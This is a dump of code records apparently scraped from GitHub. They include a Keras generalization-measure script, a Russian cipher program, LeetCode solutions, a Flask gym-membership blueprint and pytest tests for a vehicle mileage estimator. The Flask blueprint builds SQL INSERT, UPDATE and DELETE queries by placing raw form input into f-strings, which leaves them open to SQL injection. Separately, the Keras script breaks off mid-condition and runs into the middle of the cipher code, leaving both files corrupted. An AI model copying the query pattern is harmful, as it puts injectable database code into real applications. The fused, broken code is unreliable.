python_requires='>=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*',\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Information Technology',\n 'License :: OSI Approved :: '\n 'GNU Affero General Public License v3 or later (AGPLv3+)',\n 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python',\n ],\n entry_points={\n 'console_scripts': [\n 'oca-github-login = tools.github_login:main',\n 'oca-copy-maintainers = tools.copy_maintainers:main',\n 'oca-clone-everything = tools.clone_everything:main',\n 'oca-set-repo-labels = tools.set_repo_labels:main',\n 'oca-odoo-login = tools.odoo_login:main',\n 'oca-sync-users = tools.oca_sync_users:main',\n 'oca-autopep8 = tools.autopep8_extended:main',\n 'oca-gen-addons-table = tools.gen_addons_table:gen_addons_table',\n 'oca-migrate-branch = tools.migrate_branch:main',\n 'oca-migrate-branch-empty = tools.migrate_branch_empty:main',\n 'oca-pypi-upload = tools.pypi_upload:cli',\n 'oca-gen-addon-readme = tools.gen_addon_readme:gen_addon_readme',\n 'oca-gen-addon-icon = tools.gen_addon_icon:gen_addon_icon',\n 'oca-towncrier = tools.oca_towncrier:oca_towncrier',\n ],\n },\n)\n","repo_name":"julio-cesar-lazcano/oca","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"13590137367","text":"#### Load Data ####\nimport numpy as np\nimport keras\nfrom keras.datasets import cifar10\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom numpy import linalg as LA\n\nimport tensorflow as tf\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\" \nconfig = tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.85\nsession = tf.Session(config=config)\n \ndef normalize(X_train,X_test):\n #this function normalizes inputs for zero mean and unit variance\n # it is used when training a model.\n # Input: training set and test set\n # Output: normalized training set and test set according to the training set statistics.\n mean = np.mean(X_train,axis=(0,1,2,3))\n std = np.std(X_train, axis=(0, 1, 2, 3))\n X_train = (X_train-mean)/(std+1e-7)\n X_test = (X_test-mean)/(std+1e-7)\n return X_train, X_test\n\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\nx_train = x_train.astype('float32')\nx_test = x_test.astype('float32')\nx_train, x_test = normalize(x_train, x_test)\n\ny_train = keras.utils.to_categorical(y_train, 
10)\ny_test = keras.utils.to_categorical(y_test, 10)\n\ndatagen = ImageDataGenerator(\n featurewise_center=False, # set input mean to 0 over the dataset\n samplewise_center=False, # set each sample mean to 0\n featurewise_std_normalization=False, # divide inputs by std of the dataset\n samplewise_std_normalization=False, # divide each input by its std\n zca_whitening=False, # apply ZCA whitening\n rotation_range=15, # randomly rotate images in the range (degrees, 0 to 180)\n width_shift_range=0.1, # randomly shift images horizontally (fraction of total width)\n height_shift_range=0.1, # randomly shift images vertically (fraction of total height)\n horizontal_flip=True, # randomly flip images\n vertical_flip=False) # randomly flip images\n\n# (std, mean, and principal components if ZCA whitening is applied).\ndatagen.fit(x_train)\n\nfrom keras import optimizers\nfrom keras import backend as K\nimport copy\n\ndef co_measure(fname,drop_rate):\n K.clear_session()\n model = keras.models.load_model(fname+'/final_139.h5',compile=False)\n sgd = optimizers.SGD_test(add_ah=False, add_noise=0.0, a_corr=np.zeros([12,512,512]), h_corr=np.zeros([12,512,512]), lr=0.001, decay=1e-6, momentum=0.9, nesterov=True)\n model.compile(loss='categorical_crossentropy', optimizer=sgd,metrics=['accuracy'])\n orig_weights = model.get_weights()\n ori_loss, ori_acc = model.evaluate(x_train, y_train,verbose=0)\n tst_loss, tst_acc = model.evaluate(x_test, y_test,verbose=0)\n \n ##############################################f_norm,p_norm#########################################################\n model_initial = keras.models.load_model(fname+'/initial.h5',compile=False)\n sgd = optimizers.SGD_test(add_ah=False, add_noise=0.0, a_corr=np.zeros([12,512,512]), h_corr=np.zeros([12,512,512]), lr=0.001, decay=1e-6, momentum=0.9, nesterov=True)\n model_initial.compile(loss='categorical_crossentropy', optimizer=sgd,metrics=['accuracy'])\n initial_weights = model_initial.get_weights()\n \n sum_f_norm = 0\n sum_p_norm = 0\n pro_f_norm = 1\n pro_p_norm = 1\n for jj in range(len(orig_weights)):\n if len(orig_weights[jj].shape)>1:\n sum_f_norm += LA.norm(orig_weights[jj]-initial_weights[jj])\n sum_p_norm += LA.norm(orig_weights[jj])\n pro_f_norm *= LA.norm(orig_weights[jj]-initial_weights[jj])\n pro_p_norm *= LA.norm(orig_weights[jj])\n \n ##############################################spectral_norm, nop###################################################\n nop = 0\n sum_s_norm = 0\n pro_s_norm = 1\n for i in range(len(orig_weights)):\n wf = orig_weights[i]-initial_weights[i]\n if len(wf.shape) == 2:\n if wf.shape[0] > wf.shape[1]:\n aa = wf.T.dot(wf)\n else:\n aa = wf.dot(wf.T) \n sum_s_norm += np.sqrt(np.max(np.sum(np.abs(aa),axis=1)))\n pro_s_norm *= np.sqrt(np.max(np.sum(np.abs(aa),axis=1)))\n nop += wf.shape[0] * wf.shape[1]\n \n elif len(wf.shape) == 4:\n aa = 0\n for w1 in wf:\n for w2 in w1:\n zz = w2.dot(w2.T)\n aa = aa + np.max(np.sum(np.abs(zz),axis=1))\n sum_s_norm += np.sqrt(aa)\n pro_s_norm *= np.sqrt(aa)\n nop += wf.shape[0] * wf.shape[1] * wf.shape[2] * wf.shape[3]\n \n \n \n ##############################################laplace############################################################\n def get_weight_grad(model, inputs, outputs):\n \"\"\" Gets gradient of model for given inputs and outputs for all weights\"\"\"\n grads = model.optimizer.get_gradients(model.total_loss, model.trainable_weights)\n symb_inputs = (model._feed_inputs + model._feed_targets + model._feed_sample_weights)\n f = K.function(symb_inputs, grads)\n x, 
y, sample_weight = model._standardize_user_data(inputs, outputs)\n output_grad = f(x + y + sample_weight)\n return output_grad\n\n def get_layer_output_grad(model, inputs, outputs, layer=-1):\n \"\"\" Gets gradient a layer output for given inputs and outputs\"\"\"\n grads = model.optimizer.get_gradients(model.total_loss, model.layers[layer].output)\n symb_inputs = (model._feed_inputs + model._feed_targets + model._feed_sample_weights)\n f = K.function(symb_inputs, grads)\n x, y, sample_weight = model._standardize_user_data(inputs, outputs)\n output_grad = f(x + y + sample_weight)\n return output_grad\n\n def tran_a(a_1):\n a_1 = np.mean(a_1, axis=0)\n a_1 = a_1.reshape(a_1.shape[0]*a_1.shape[1],-1)\n a_1 = np.mean(a_1,axis=0)\n return a_1\n\n def tran_h(h_2):\n h_2 = np.mean(h_2, axis=0)\n h_2 = h_2.reshape(h_2.shape[0]*h_2.shape[1],-1)\n h_2 = np.mean(h_2,axis=0)+10**-13\n return h_2\n\n def load(a):\n a_1 = []\n h_2 = []\n num = 0\n layer_1 = K.function([model.layers[0].input], [model.layers[a].output])\n for num in [0,20,40,60,80,100,120]:\n a_1.append(tran_a(layer_1([x_train[num:num+20]])[0]))\n\n for num in [0,20,40,60,80,100,120]:\n h_2.append(tran_h(get_layer_output_grad(model, x_train[num:num+20], y_train[num:num+20], a+1)[0]))\n return a_1, h_2\n \n a_1, h_2 = load(-13)\n split = 16\n deet_a = []\n for i in range(int(len(a_1[0])/split)):\n a = np.zeros((split,split))\n for e in range(50):\n noise = (np.random.uniform(0,1,split)>drop_rate).astype(float)\n a += np.kron(a_1[0][i*split:i*split+split]*noise, np.array([a_1[0][i*split:i*split+split]*noise]).reshape(-1,1))\n for j in range(1,len(a_1)):\n a += np.kron(a_1[j][i*split:i*split+split]*noise, np.array([a_1[j][i*split:i*split+split]*noise]).reshape(-1,1)) \n a = np.abs(np.linalg.inv(a/50))\n a = a/np.max(a)\n for j in range(len(a)):\n a[j][j] = 1\n deet_a.append(np.linalg.det(a))\n deet_a = np.mean(deet_a)\n\n\n deet_h = []\n for e in range(20):\n for i in range(int(len(a_1[0])/split)):\n a = np.kron(h_2[0][i*split:i*split+split], np.array([h_2[0][i*split:i*split+split]]).reshape(-1,1)) \n for j in range(1,len(h_2)):\n a += np.kron(h_2[j][i*split:i*split+split], np.array([h_2[j][i*split:i*split+split]]).reshape(-1,1))\n a = a/np.max(a)\n a += np.random.normal(loc=0.0, scale=0.00001, size=(len(a),len(a)))\n a = np.abs(np.linalg.inv(a))\n a = a/np.max(a)\n for j in range(len(a)):\n a[j][j] = 1\n deet_h.append(np.linalg.det(a))\n deet_h = np.mean(deet_h) \n\n ##############################################sharpness############################################################\n def add_noise(weights, sigma):\n for i in range(len(weights)):\n n = np.random.normal(0, sigma, weights[i].shape)\n weights[i] += weights[i]*n\n model.set_weights(weights)\n index = np.random.randint(0,50000,5000)\n loss, acc = model.evaluate(x_train[index], y_train[index],verbose=0)\n return acc\n\n lower = 0\n sigma = 0.1 \n acc = add_noise(copy.deepcopy(orig_weights), sigma)\n\n ssigma = []\n aacc = []\n ssigma.append(sigma)\n aacc.append(acc)\n for i in range(10):\n if ori_acc-acc>0.05:\n sigma = sigma-(sigma-lower)/2\n acc1 = []\n for j in range(5):\n acc1.append(add_noise(copy.deepcopy(orig_weights), sigma))\n acc = min(acc1)\n else:\n a = (sigma - lower)/2\n lower = copy.deepcopy(sigma)\n sigma = sigma*1.1\n acc1 = []\n for j in range(5):\n acc1.append(add_noise(copy.deepcopy(orig_weights), sigma))\n acc = min(acc1)\n ssigma.append(sigma)\n aacc.append(acc)\n\n aacc = np.array(aacc)\n aacc = aacc - ori_acc + 0.05\n minacc = 1\n mindex = 0\n for i in 
range(len(aacc)):\n if aacc[i]>0 and aacc[i]\r\n if mode == 'encrypt':\r\n num += LETTERS.find(key[keyIndex])\r\n\r\n elif mode == 'decrypt':\r\n num -= LETTERS.find(key[keyIndex])\r\n\r\n num %= len(LETTERS) # handle wrap-around\r\n\r\n # append the letter in the same case it had in the original message\r\n if symbol.isupper():\r\n translate.append(LETTERS[num])\r\n elif symbol.islower():\r\n translate.append(LETTERS[num].lower())\r\n\r\n keyIndex += 1 # move on to the next key character\r\n if keyIndex == len(key):\r\n keyIndex = 0\r\n else:\r\n # if the symbol is not found in LETTERS -> leave it unchanged\r\n translate.append(symbol)\r\n return ''.join(translate)\r\n\r\n\r\ndef main():\r\n # myMessage = input('Enter a message: ')\r\n myMessage = \"Секретное сообщение, которое невозможно будет взломать.\"\r\n # myMessage = \"Юцъамчеис ммбицрцфл, жхйесцп жгзюяшгфжш авмъл бырхлэнк.\"\r\n\r\n myMode = input(\"Enter:\\nencrypt - to encrypt the message\\ndecrypt - to decrypt the message:\\n\")\r\n\r\n if myMode == 'encrypt':\r\n myKey = getKey(myMessage.replace(' ', ''))\r\n translated = translateMessage(myKey, myMessage, 'encrypt')\r\n elif myMode == 'decrypt':\r\n myKey = input('Enter the key: ')\r\n translated = translateMessage(myKey, myMessage, 'decrypt')\r\n else:\r\n print('Invalid input: expected encrypt or decrypt')\r\n sys.exit()\r\n\r\n if myMode == 'encrypt':\r\n print(f'\\nKey:\\n{myKey}\\nMessage:\\n{translated}')\r\n elif myMode == 'decrypt':\r\n print(f'\\nMessage:\\n{translated}')\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"MrTOOGLE/Disposable-cipher-pad","sub_path":"Проект_Одноразовый шифроблокнот.py","file_name":"Проект_Одноразовый шифроблокнот.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"3434142080","text":"class Solution:\n romans = [\n (1, 'I'),\n (5, 'V'),\n (10, 'X'),\n (50, 'L'),\n (100, 'C'),\n (500, 'D'),\n (1000, 'M')\n ][::-1]\n def intToRoman(self, num: int) -> str:\n result = ''\n for i,(nu_val, numeral) in enumerate(self.romans):\n if num >= nu_val:\n result += numeral * (num//nu_val)\n num %= nu_val\n if numeral != 'I':\n pre_nu_val, pre_numeral = self.romans[i + 1 + int(i%2==0)]\n if num >= nu_val - pre_nu_val:\n result += pre_numeral + numeral\n num %= pre_nu_val\n return result\n","repo_name":"jlcarr/LeetCode","sub_path":"Problem_0012/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"13176628060","text":"class Solution:\n def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:\n ans = []\n que = collections.deque()\n for i in range(k):\n while que and que[-1] < nums[i]:\n que.pop()\n que.append(nums[i])\n ans.append(que[0])\n\n for i in range(k,len(nums)):\n if nums[i-k] == que[0]:\n que.popleft()\n while que and que[-1] < nums[i]:\n que.pop()\n que.append(nums[i])\n ans.append(que[0])\n return ans\n","repo_name":"Demo0617/LeetCode","sub_path":"LC/hard/array/59.maxSlidingWindow.py","file_name":"59.maxSlidingWindow.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"13856996310","text":"from flask import Blueprint,render_template\r\nfrom flask import *\r\nfrom datetime import datetime as dt\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom sqlalchemy.exc 
import IntegrityError\r\nfrom sqlalchemy.sql import text\r\nfrom models import *\r\n\r\n\r\nmembers_blueprint=Blueprint('members',__name__)\r\n\r\n\r\n@members_blueprint.route('/')\r\n@members_blueprint.route('/<int:page_num>')\r\ndef member(page_num=1):\r\n count = db.engine.execute(f\"SELECT count('M_ID') from 'MEMBERS'\").scalar()\r\n \r\n Data_Paginate = MEMBERS.query.filter_by().paginate(per_page=5,page=page_num , error_out = False)\r\n \r\n return render_template('/adminstrap_theme/adminstrap_theme/members.html' , ismembers=\"active\" , title = \"Members\" , rows = MEMBERS.query.all() , Data_Paginate=Data_Paginate , isact=\"active\" , mcount=count , packages = PACKAGE.query.all() , trainers = TRAINERS.query.all())\r\n\r\n\r\n@members_blueprint.route('/add_member' , methods=['POST'])\r\ndef add_member():\r\n Data_Paginate = MEMBERS.query.filter_by().paginate(per_page=5)\r\n if request.method == \"POST\":\r\n m_name = request.form.get(\"m_name\")\r\n m_gender = request.form.get(\"m_gender\")\r\n m_joindate = dt.utcnow().date()\r\n m_dob = request.form.get(\"m_dob\")\r\n m_weight = request.form.get(\"m_weight\")\r\n m_height = request.form.get(\"m_height\")\r\n m_email = request.form.get(\"m_email\")\r\n m_mob_no = request.form.get(\"m_mob_no\")\r\n m_location = request.form.get(\"m_location\")\r\n tr_id = request.form.get(\"tr_id\")\r\n pk_id = request.form.get(\"pk_id\")\r\n \r\n \r\n try:\r\n fk_check = db.session.execute(\"pragma foreign_keys=on\")\r\n \r\n if m_dob=='':\r\n flash(\"Please select date of birth\" , \"danger\")\r\n return redirect(url_for('members.member',page_num=Data_Paginate.pages))\r\n elif tr_id == '' or pk_id == '' or (pk_id=='' and tr_id==''):\r\n flash(\"Please Select the Trainer / Package\",\"danger\")\r\n return redirect(url_for('members.member',page_num=Data_Paginate.pages))\r\n \r\n trainer = db.session.execute(f\"INSERT INTO 'MEMBERS'('M_NAME' , 'M_GENDER' ,'M_DOB' ,'M_WEIGHT' ,'M_HEIGHT' , 'M_EMAIL' , 'M_MOB_NO' , 'M_JOINDATE' , 'M_LOCATION' , 'TR_ID' , 'PK_ID') VALUES( '{m_name}' ,'{m_gender}' ,'{m_dob}' ,'{m_weight}' , '{m_height}' , '{m_email}' , '{m_mob_no}' , '{m_joindate}' , '{m_location}' , '{tr_id}' , '{pk_id}') \")\r\n db.session.commit()\r\n except Exception as e:\r\n print(e)\r\n db.session.rollback()\r\n flash(\"Member / email / mobile number already exists\" , \"danger\" )\r\n return redirect(url_for('members.member',page_num=Data_Paginate.pages))\r\n \r\n flash(\"Member added successfully\" , \"success\")\r\n return redirect(url_for('members.member',page_num=Data_Paginate.pages))\r\n\r\n\r\n@members_blueprint.route('/edit_member/<int:m_id>' ,methods=[\"POST\"])\r\ndef edit_member(m_id):\r\n Data_Paginate = MEMBERS.query.filter_by().paginate(per_page=5)\r\n\r\n if request.method == \"POST\":\r\n m_name = request.form.get(\"m_name\")\r\n m_gender = request.form.get(\"m_gender\")\r\n m_dob = request.form.get(\"m_dob\")\r\n m_weight = request.form.get(\"m_weight\")\r\n m_height = request.form.get(\"m_height\")\r\n m_email = request.form.get(\"m_email\")\r\n m_mob_no = request.form.get(\"m_mob_no\")\r\n m_location = request.form.get(\"m_location\")\r\n tr_id = request.form.get(\"tr_id\")\r\n pk_id = request.form.get(\"pk_id\")\r\n \r\n try:\r\n db.engine.execute(f\"Update 'MEMBERS' SET M_NAME='{m_name}' , M_GENDER= '{m_gender}' , M_DOB='{m_dob}' , M_WEIGHT='{m_weight}' , M_HEIGHT='{m_height}' , M_MOB_NO = '{m_mob_no}' , M_EMAIL = '{m_email}' , M_LOCATION = '{m_location}' , PK_ID = '{pk_id}' , TR_ID = '{tr_id}' where M_ID ='{m_id}' \")\r\n flash(\"Member updated 
successfully\" , \"success\")\r\n except Exception as e:\r\n print(e)\r\n db.session.rollback()\r\n flash(\"Some error occurred\" , \"danger\" )\r\n return redirect(url_for('members.member',page_num=Data_Paginate.pages))\r\n \r\n \r\n return redirect(url_for('members.member',page_num=Data_Paginate.pages))\r\n\r\n\r\n@members_blueprint.route('/delete_member/<int:m_id>' )\r\ndef delete_member(m_id):\r\n Data_Paginate = MEMBERS.query.filter_by().paginate(per_page=5)\r\n try:\r\n print(m_id)\r\n fk_check = db.session.execute(\"pragma foreign_keys=on\")\r\n db.session.execute(f\"DELETE FROM MEMBERS WHERE 'MEMBERS'.'M_ID' = {m_id}\")\r\n db.session.commit()\r\n except Exception as e:\r\n print(e)\r\n db.session.rollback()\r\n flash(\"Some error occurred\" , \"danger\" )\r\n return redirect(url_for('members.member',page_num=Data_Paginate.pages))\r\n \r\n flash(\"Member deleted successfully\" , \"danger\")\r\n return redirect(url_for('members.member',page_num=Data_Paginate.pages))","repo_name":"tejas-mn/DBMS-PROJECT","sub_path":"members.py","file_name":"members.py","file_ext":"py","file_size_in_byte":4933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"30482947499","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 19 12:21:24 2016\n\n@author: lzeng\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom random import randint\nfrom sklearn.ensemble import RandomForestRegressor\nfrom itertools import compress\nfrom func import get_leaves\nfrom func import get_lineage\n\ndef get_partial_kernel(forest, dataset):\n SAMPLE_SIZE = len(dataset)\n\n #Select random tree\n TreeIndex = randint(0,forest.n_estimators-1)\n Arbre = forest.estimators_[TreeIndex]\n #Define tree parameters\n n_nodes = Arbre.tree_.node_count\n children_left = Arbre.tree_.children_left\n children_right = Arbre.tree_.children_right\n\n # h =Arbre.tree_.max_depth #all trees don't have the same height???\n\n #Node selection\n leaf_index = Arbre.apply(dataset)\n leaf_nodes = np.array(list(set(leaf_index))) # Remove duplicates\n # print \"Leaf index size: {}\".format(len(leaf_nodes))\n\n is_leaves, node_depth = get_leaves(children_left, children_right, n_nodes)\n # print \"is_leaves: {}\".format(sum(is_leaves))\n myparents = get_lineage(Arbre, leaf_index, node_depth)\n\n myparents = np.array(myparents)\n\n h = max(node_depth[is_leaves]) - 1\n d = randint(0, h)\n\n # print(d)\n\n # print(np.mean(node_depth[is_leaves]))\n # print(np.var(node_depth[is_leaves]))\n # print \"Max-height: {}\".format(h)\n # print \"Chosen-height: {}\".format(d)\n\n nth_parent_for_sample = []\n for lineage in myparents:\n ancest = None\n if len(lineage) <= d:\n ancest = lineage[-1]\n else:\n ancest = lineage[d]\n nth_parent_for_sample.append(ancest)\n\n partial_kernel = np.zeros([SAMPLE_SIZE, SAMPLE_SIZE])\n\n #Loop over each datapoint : two data points are assigned to the same cluster if they have the same ancestor\n for i in range(SAMPLE_SIZE):\n for j in range(i, SAMPLE_SIZE):\n if nth_parent_for_sample[i][0] == nth_parent_for_sample[j][0]:\n partial_kernel[i][j] = 1\n partial_kernel[j][i] = 1\n\n return partial_kernel\n\n\ndef get_kernel(train_data, test_data, label):\n\n #Define forest (n_estimators = number of trees)\n forest = RandomForestRegressor(n_estimators=1000, warm_start = True)\n forest = forest.fit(train_data, label)\n\n dataset = np.concatenate((train_data, test_data), axis=0)\n\n SAMPLE_SIZE = len(dataset)\n M = 100\n\n #Loop that generates samples of the PDF\n kernel_list = 
np.empty([M, SAMPLE_SIZE, SAMPLE_SIZE])\n for m in range(M):\n print(\"Building partial kernel: {}\".format(m))\n kernel_list[m,:,:] = get_partial_kernel(forest, dataset)\n\n #Average the samples to compute the kernel\n kernel = np.mean(kernel_list, axis=0)\n\n # B = np.zeros((SAMPLE_SIZE, SAMPLE_SIZE))\n # I = np.identity(SAMPLE_SIZE)\n # alpha = 0.1\n\n # for m in range(M):\n # B += np.linalg.inv(kernel_list[m,:,:] + alpha * I)\n\n # B *= M\n # return B\n\n return kernel\n \n\n","repo_name":"marthall/random_forest_kernel","sub_path":"test/RegressionKernel.py","file_name":"RegressionKernel.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"13044263736","text":"\"\"\"Unit tests for the `estimator` module.\"\"\"\n\nimport math\nfrom datetime import date\n\nimport pytest\nfrom mileage.estimator import (\n Calculator,\n MeanMileage,\n MOTTest,\n ProjectedMileage,\n SaleAdvertisement,\n Vehicle,\n VRMChange,\n)\n\n\n@pytest.fixture(name=\"vehicle\")\ndef fixture_vehicle() -> Vehicle:\n \"\"\"Vehicle to be used in tests.\"\"\"\n return Vehicle(\n vrm=\"AB51 DVL\",\n make=\"Ford\",\n model=\"Escape Sedan\",\n registration_date=date(2001, 9, 1),\n )\n\n\ndef test_add_get_events_no_filter(vehicle: Vehicle) -> None:\n \"\"\"Verify that timeline events can be added and retrieved from a vehicle.\"\"\"\n events = vehicle.get_events()\n assert len(events) == 0\n\n mot_test = MOTTest(date=date(2003, 8, 15), mileage=20_000, result=True)\n vehicle.add_event(mot_test)\n\n events = vehicle.get_events()\n assert len(events) == 1\n assert events[0] == mot_test\n\n\ndef test_add_get_events_filtered(vehicle: Vehicle) -> None:\n \"\"\"Verify that timeline events can be added and retrieved from a vehicle.\n\n A filter is applied.\n \"\"\"\n vehicle.add_event(MOTTest(date=date(2003, 8, 15), mileage=20_000, result=False))\n vehicle.add_event(MOTTest(date=date(2003, 8, 17), mileage=20_020, result=False))\n\n events = vehicle.get_events() # type: ignore\n assert len(events) == 2\n\n mot_result_filter = lambda event: event.result # type: ignore\n events = vehicle.get_events(mot_result_filter) # type: ignore\n assert len(events) == 0\n\n mot_mileage_filter = lambda event: event.mileage == 20_000 # type: ignore\n events = vehicle.get_events(mot_mileage_filter) # type: ignore\n assert len(events) == 1\n\n\ndef test_add_get_events_nonchronological(vehicle: Vehicle) -> None:\n \"\"\"Verify that timeline events are maintained in chronologically ascending order.\"\"\"\n mot_test = MOTTest(date=date(2003, 8, 15), mileage=20_000, result=False)\n advert = SaleAdvertisement(date=date(2003, 9, 1), mileage=24_000, price=10_000_00)\n vrm_change = VRMChange(\n date=date(2003, 10, 10), from_VRM=\"AB51 BCD\", to_VRM=\"AB51 DVL\"\n )\n\n vehicle.add_event(advert)\n vehicle.add_event(vrm_change)\n vehicle.add_event(mot_test)\n\n events = vehicle.get_events()\n assert len(events) == 3\n assert isinstance(events[0], MOTTest) and events[0].date == mot_test.date\n assert isinstance(events[1], SaleAdvertisement) and events[1].date == advert.date\n assert isinstance(events[2], VRMChange) and events[2].date == vrm_change.date\n\n\ndef test_add_get_events_duplicate(vehicle: Vehicle) -> None:\n \"\"\"Verify that the vehicle timeline does not contain duplicate events.\"\"\"\n vehicle.add_event(MOTTest(date=date(2003, 8, 15), mileage=20_000, result=False))\n vehicle.add_event(\n SaleAdvertisement(date=date(2003, 9, 1), mileage=24_000, 
price=10_000_00)\n )\n vehicle.add_event(\n VRMChange(date=date(2003, 10, 10), from_VRM=\"AB51 BCD\", to_VRM=\"AB51 DVL\")\n )\n vehicle.add_event(MOTTest(date=date(2003, 8, 15), mileage=20_000, result=False))\n vehicle.add_event(\n SaleAdvertisement(date=date(2003, 9, 1), mileage=24_000, price=10_000_00)\n )\n vehicle.add_event(\n VRMChange(date=date(2003, 10, 10), from_VRM=\"AB51 BCD\", to_VRM=\"AB51 DVL\")\n )\n\n events = vehicle.get_events()\n assert len(events) == 3\n assert isinstance(events[0], MOTTest)\n assert isinstance(events[1], SaleAdvertisement)\n assert isinstance(events[2], VRMChange)\n\n\ndef test_average_annual_mileage_single_event(vehicle: Vehicle) -> None:\n \"\"\"Verify calculation of average annual mileage.\n\n There is a single mileage-present event in the event timeline.\n \"\"\"\n vehicle.add_event(\n SaleAdvertisement(date=date(2003, 9, 1), mileage=24_000, price=10_000_00)\n )\n\n mean_annual_mileage = vehicle.calculate_timeline(MeanMileage())\n assert math.isclose(mean_annual_mileage, 12_008, rel_tol=1e-04)\n\n\ndef test_average_annual_mileage_multi_events(vehicle: Vehicle) -> None:\n \"\"\"Verify calculation of average annual mileage.\n\n There are multiple mileage-present events in the event timeline.\n \"\"\"\n vehicle.add_event(MOTTest(date=date(2003, 8, 15), mileage=20_000, result=False))\n vehicle.add_event(\n SaleAdvertisement(date=date(2003, 9, 1), mileage=24_000, price=10_000_00)\n )\n\n mean_annual_mileage = vehicle.calculate_timeline(MeanMileage())\n assert math.isclose(mean_annual_mileage, 12_008, rel_tol=1e-04)\n\n\ndef test_average_annual_mileage_last_no_mileage(vehicle: Vehicle) -> None:\n \"\"\"Verify calculation of average annual mileage.\n\n The last timeline event is mileage-absent.\n \"\"\"\n vehicle.add_event(\n SaleAdvertisement(date=date(2003, 9, 1), mileage=24_000, price=10_000_00)\n )\n vehicle.add_event(\n VRMChange(date=date(2003, 10, 10), from_VRM=\"AB51 BCD\", to_VRM=\"AB51 DVL\")\n )\n\n mean_annual_mileage = vehicle.calculate_timeline(MeanMileage())\n assert math.isclose(mean_annual_mileage, 12_008, rel_tol=1e-04)\n\n\ndef test_average_annual_mileage_no_mileage(vehicle: Vehicle) -> None:\n \"\"\"Verify calculation of average annual mileage handles no mileage in timeline.\n\n This can be due to not having events in the timeline or all events in the timeline\n not having mileage information.\n \"\"\"\n mean_annual_mileage = vehicle.calculate_timeline(MeanMileage())\n assert mean_annual_mileage == 7900\n\n vehicle.add_event(\n VRMChange(date=date(2003, 10, 10), from_VRM=\"AB51 BCD\", to_VRM=\"AB51 DCD\")\n )\n vehicle.add_event(\n VRMChange(date=date(2003, 11, 10), from_VRM=\"AB51 DCD\", to_VRM=\"AB51 DVL\")\n )\n\n mean_annual_mileage = vehicle.calculate_timeline(MeanMileage())\n assert mean_annual_mileage == 7900\n\n\ndef test_projected_mileage_isolated(vehicle: Vehicle) -> None:\n \"\"\"Verify projected mileage calculation in using a stubbed average calculator.\"\"\"\n\n class StubbedCalculator(Calculator):\n \"\"\"Stubbed calculator for unit testing.\"\"\"\n\n def calculate(self, vehicle: Vehicle) -> float:\n return 15_000\n\n projected_calculator = ProjectedMileage(StubbedCalculator(), date(2004, 9, 1))\n projected_mileage = vehicle.calculate_timeline(projected_calculator)\n assert math.isclose(projected_mileage, 45_011, rel_tol=1e-04)\n\n\ndef test_projected_mileage_multi_events(vehicle: Vehicle) -> None:\n \"\"\"Verify projected mileage calculation using a `MeanMileage` calculator.\n\n The vehicle contains multiple timeline 
events.\n \"\"\"\n vehicle.add_event(MOTTest(date=date(2003, 8, 15), mileage=20_000, result=False))\n vehicle.add_event(\n SaleAdvertisement(date=date(2003, 9, 1), mileage=24_000, price=10_000_00)\n )\n vehicle.add_event(\n VRMChange(date=date(2003, 10, 10), from_VRM=\"AB51 BCD\", to_VRM=\"AB51 DVL\")\n )\n\n projected_calculator = ProjectedMileage(MeanMileage(), date(2004, 9, 1))\n projected_mileage = vehicle.calculate_timeline(projected_calculator)\n assert math.isclose(projected_mileage, 36_032, rel_tol=1e-04)\n\n\ndef test_projected_mileage_no_mileage(vehicle: Vehicle) -> None:\n \"\"\"Verify projected mileage calculation using a `MeanMileage` calculator.\n\n The vehicle does not contain timeline events.\n \"\"\"\n projected_calculator = ProjectedMileage(MeanMileage(), date(2004, 9, 1))\n projected_mileage = vehicle.calculate_timeline(projected_calculator)\n assert math.isclose(projected_mileage, 23_705, rel_tol=1e-04)\n\n\ndef test_event_invalid_date(vehicle: Vehicle) -> None:\n \"\"\"Verify that adding an event earlier than the registration date is not allowed.\"\"\"\n with pytest.raises(ValueError):\n vehicle.add_event(MOTTest(date=date(2001, 8, 31), mileage=20_000, result=False))\n","repo_name":"jashburn8020/vehicle-mileage","sub_path":"tests/estimator_test.py","file_name":"estimator_test.py","file_ext":"py","file_size_in_byte":7706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
